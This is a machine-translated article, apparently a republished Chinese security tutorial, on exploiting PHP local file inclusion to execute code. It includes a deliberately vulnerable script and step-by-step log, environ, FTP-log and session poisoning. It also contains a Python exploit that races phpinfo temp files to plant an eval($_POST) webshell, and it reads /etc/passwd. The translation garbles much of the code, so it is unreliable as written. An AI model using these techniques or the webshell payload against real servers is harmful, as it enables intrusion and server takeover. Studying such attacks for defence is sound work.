Attackers can exploit the local vulnerability to execute arbitrary code.

Source: Internet
Author: User
Tags apache log

Abstract:At present, the use of LFI vulnerabilities on the network is scattered, many of them are also very simple, and no examples are provided. Based on the summary of other people's papers, this article adds some practical demonstration examples and code, and added the use of session file inclusion.
Abstract:On the Internet, the Exploits to Local File Include Vulnerability are scattered, and most of them are brief. in this paper, Iadd a practical demonstration of examples and source code based of other papers. in addition, I find another way to exploit this vulnerability with including the session file.
 
Keywords:LFI, local inclusion, code utilization, and usage Summary
 
1 Overview
 
Local File Include is a major feature of php scripts. It is often used by programmers for convenience of development. For example, if you write a series of function functions into function. php, you can directly write a sentence in the file header when a file needs to be called. <? Php include fuction. php?> You can call the internally defined functions.
Local Inclusion Vulnerability is a typical high-risk vulnerability in PHP. Because the programmer does not check the input of user-controllable variables, the user can control the contained files. When successful exploitation, the web server can execute a specific file as php, as a result, the user can obtain certain server permissions.
 
2. Use LFI to execute PHP code
 
2.1 local vulnerability instance display:
 
The test. php code of the demo script file is as follows:
<? Php
If (! Ini_get ('display _ errors ')){
Ini_set ('display _ errors ', 'on ');
}
Error_reporting (E_ALL );
$ F = $ _ GET ["file"];
If ($ f ){
Require "". $ f. ". php ";
} Else {
Print ("No File encoded ded ");
}
?>
In normal use, may be like this: http://www.xxx.com/test.php? F = fuction. In this way, the function file is included. However, because the file parameter is not filtered, we can submit the parameter content by ourselves, which leads to the Inclusion Vulnerability. For example, submit:
Http://www.xxx.com/index.php? Fw.shell.txt000000,the content of shell.txt is our webshell. Because index.php is in front, shell.txt is regarded as a Trojan for execution.
Build an instance Environment on a virtual machine,
Direct access without assigning the file parameter:

Figure 1. test. php when no parameters are submitted
The value assignment file parameter is/etc/passwd.

Figure 2. Include the/etc/passwd file
Included successfully.
 
2.2 upload files by yourself and implement inclusion
 
Here, we mainly combine some file upload points on the server, such as Avatar upload and Album photo upload, and then use the inclusion vulnerability with the % 00 truncation feature of php (the truncation feature has been fixed after php5.4, in this example, % 00 is no longer used. Test other functions by yourself ).
Suppose we can customize the upload of the Avatar. The Avatar file is under photo in the root directory of the website, and the specific directory can be uploaded to view the image Url Information.
First, we only make image files that contain malicious code:
Ask the normal profile file. Run copy photo.jpg/B + shell. php/B eval.jpg in the command line.

Figure 3. Create an image Trojan using the copy command in Windows
Eval.jpgand phpoto.jpg can be opened normally.
This method is useful for verifying strict upload points. In fact, you can simply change the suffix and add a GIF89a before the php code to bypass most detection tasks.
Upload eval.jpg and include it. The effect is as follows:

Figure 4. Trojan Effect
In this case, php code is successfully executed using the local Inclusion Vulnerability.
 
2.3 Include environment variable files
 
In Linux, there is a file/proc/self/environ, which stores some system variables. The content is as follows:

Figure 5. BT5/proc/self/environ file content
However, you can insert your own content to the file by modifying the agent information of the browser, write the php code, and then use LFI to include the content to exploit the vulnerability.
First, verify the access permission to see if you have the permission to read the file content.

Figure 6. Include the/proc/self/environ file
Access is denied by default on the BT server. The permission is as follows:

Figure 7. Environ file permission settings
To facilitate the demonstration, use an environment with the permission to access the environ file.
Normal inclusion

Figure 8. Validity Period of the envrion file with the permission
We can see that the current USER_AGENT variable is written into this file, and USER_AGENT can be forged. Here I use firefox's UAControl to forge it, first, edit UAControl's user agent information for this article:

Figure 9. Modify User-agent Information
Then you can access the previous webpage of the website and include the environ file again:

Figure 10. php code executed successfully
You can find that the php code has been executed.
2.4 contain web server log files
Apache log files are very common in the use of LFI vulnerabilities. Because no matter whether the Get request or Post request we submit is recorded in the log file by apache. Therefore, we can control the request content and write malicious code into the log file to implement inclusion.
First, check whether you have the permission to include

Figure 11. access denied by default
Similarly, it is rejected by default.

Figure 12. Default Log File Permissions
Next we will find a practical environment with permissions for testing.
You can include httpd. conf to view the location of the log file and configure the file name format. Here, you can find a log for exploitation (php_error.log), which records php errors during execution,

Figure 13. php_error File Content
So we directly access test. php? File = ../<? Php phpinfo ();?>. Php will be recorded. In this way, the php code is successfully written into the log file.
Direct access:

Figure 14. Insert php code into a get request
Blank is returned because an error is reported if webserver is not enabled.
After

Figure 15. The error log file is successfully included.
Php code executed successfully
In actual use, pay attention to the following issues:
1) Access. log and error. log are too large, which may cause timeout. So if it can contain other files, it will include other files.
2) The written code is escaped. For example, if we submit test. php? File = ../<? Php phpinfo ();?>. In php, <? Php is followed by a space. If this space is converted to % 20, php code execution fails. Sometimes it is written into access. the two angle brackets in the log file may also be escaped. In actual tests, Firefox and IE8 are escaped, but IE6 is not. In all the above cases, you can use ie6 or use NC to directly submit GET requests. At the same time, if the short_tag of the web server is enabled, do not worry about space escape.
 
2.5 include other log files
 
The file inclusion vulnerability is essentially a file that we can control the file content, so other log files can also be included and used if we can control it. The FTP log file is used as an example.
In actual use, you must first obtain the linux release version and FTP server version of the target system, and then find the default log directory.
The first step is to test the permission and check whether the permission is available to read files:

Figure 16. FTP Log File Content
And can be included.
The following is a local logon, but the user name is filled in: <? Php phpinfo ();?>

Figure 17. Insert php code in the login window
The effect after successful inclusion is as follows:

Figure 18. FTP log files are successfully included
The php code has been successfully executed.
 
2.6 Use phpinfo to include temporary files
 
Php has a feature that when we upload data to any php file post request on the server, a temporary file will be generated. By default, it is uploaded to the tmp directory and the file name is random. Of course, we can give a brute-force guess, but it is too bad. A foreign security researcher proposed to use phpinfo to find the path of the uploaded file, because phpinfo records some requests, including the temporary file name and directory generated on the server. So with phpinfo (), we can find the temporary file name and use it.
The following is a python exploitation code:
#! /Usr/bin/env python
# Encoding = UTF-8
# Author: idwar
# Http://secer.org
 
'''
 
You may need to change the following:
1. host
2. port
3. Name and path of the phpinfo page in the request
4. URLs in the hello_lfi () function, that is, pages and parameters with lfi
5. If it fails or an error is reported, try increasing the padding length to 7000 or 8000.
6. If magic_quotes_gpc is enabled or magic_quotes_gpc cannot be set to % 00, try to cut it and modify it at the position (4 ).
Good Luck :)
 
'''
 
Import re
Import urllib2
Import hashlib
From socket import *
From time import sleep
Host = '192. 168.92.132'
# Host = gethostbyname (domain)
Port = 80
Shell_name = hashlib. md5 (host). hexdigest () + '. php'
Pattern = re. compile (r''' \ [tmp_name \] \ s = & gt; \ s (. *) \ W * error] ''')
 
Payload = ''' idwar <? Php fputs (fopen ('./''' + shell_name + ''' \', "w"), "idwar was here <? Php eval (\$ _ POST [a]);?> ")?> \ R '''
Req = ''' --------------------------------- 7dbff1ded0714 \ r
Content-Disposition: form-data; name = "dummyname"; filename = "test.txt" \ r
Content-Type: text/plain \ r
\ R
% S
----------------------------- 7dbff1ded0714 -- \ r ''' % payload
 
Padding = 'A '* 8000
Request = ''' POST/test/1.php? A = ''' + padding + ''' HTTP/1.0 \ r
Cookie: PHPSESSID = q249llvfromc1or39t6tvnun42; othercookie = ''' + padding + ''' \ r
HTTP_ACCEPT: ''' + padding + ''' \ r
HTTP_USER_AGENT: ''' + padding + ''' \ r
HTTP_ACCEPT_LANGUAGE: ''' + padding + ''' \ r
HTTP_PRAGMA: ''' + padding + ''' \ r
Content-Type: multipart/form-data; boundary = --------------------------- 7dbff1ded0714 \ r
Content-Length: % s \ r
Host: % s \ r
\ R
% S ''' % (len (req), host, req)
Def hello_lfi ():
While 1:
S = socket (AF_INET, SOCK_STREAM)
S. connect (host, port ))
S. send (request)
Data =''
While R' </body> Data = s. recv (9999)
Search _ = re. search (pattern, data)
If search _:
Tmp_file_name = search _. group (1)
Url = r 'HTTP: // 192.168.92.132/test/2.php? S = % s % 00 '% tmp_file_name
Print url
Search_request = urllib2.Request (url)
Search_response = urllib2.urlopen (search_request)
Html_data = search_response.read ()
If 'idwar 'in html_data:
S. close ()
Return '\ nDone. Your webshell is: \ n % s \ n' % ('HTTP: //' + host + '/' + shell_name)
# Import sys; sys. exit ()
S. close ()
If _ name _ = '_ main __':
Print hello_lfi ()
Print '\ n Good Luck :)'
The utilization effect is as follows:

Figure 19. Use the temporary php file in the tool

Figure 20. The file is indeed generated on the server
We can see that the file name of the temporary file is obtained successfully and the malicious code is injected into the temporary directory of tmp on the server.
 
2.7 contain session files
 
Session files are generally stored in/tmp/,/var/lib/php/session/,/var/lib/php/session/, and other directories. The file names are generally saved using sess_SESSIONID.
First, check and find the session file and include it once: the file name can be viewed through the fire cookie plug-in of firefox.
Pay attention to the following points during actual application:
1) The website may not generate a temporary session, store user information in cookie mode, or have no user information at all.
2) control the content of the Session file. At this time, we need to first view the content of the current session through the inclusion to see if there is any controllable variable in the session value, such as the variable value in the url. Or the username of the current user. If so, we can control malicious code writing to the session file by modifying the controllable variable value. If you do not have one, you can check the server to report an error. Sometimes the server writes the error message to the user's session file. We control the statements that enable the server to report errors to write malicious code into the session.
 
3 Summary
From the developer's point of view, variables that can be controlled by any user must be strictly checked and filtered. Vulnerabilities may exist wherever users can enter them. From the attacker's point of view, in the use of LFI, we always need to note that on the server, as long as we can write data, it can be included.
 
4 references:
[1] Gynvael Coldwind PHP_LFI_rfc1867_temporary_files 2011.3

[2] SirGod On insecurity-ro《Shell via LFI –proc/self/environ method》
[3] http://www.bkjia.com/article/201202/119213.html#use the phpinfoinfo lfi File
[4] http://www.php.net/manual/en/features.file-upload.post-method.php "POST method uploads"
[5] LengF 80sec Group 《 PHP security LFI vulnerability GetShell method parade"2011

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.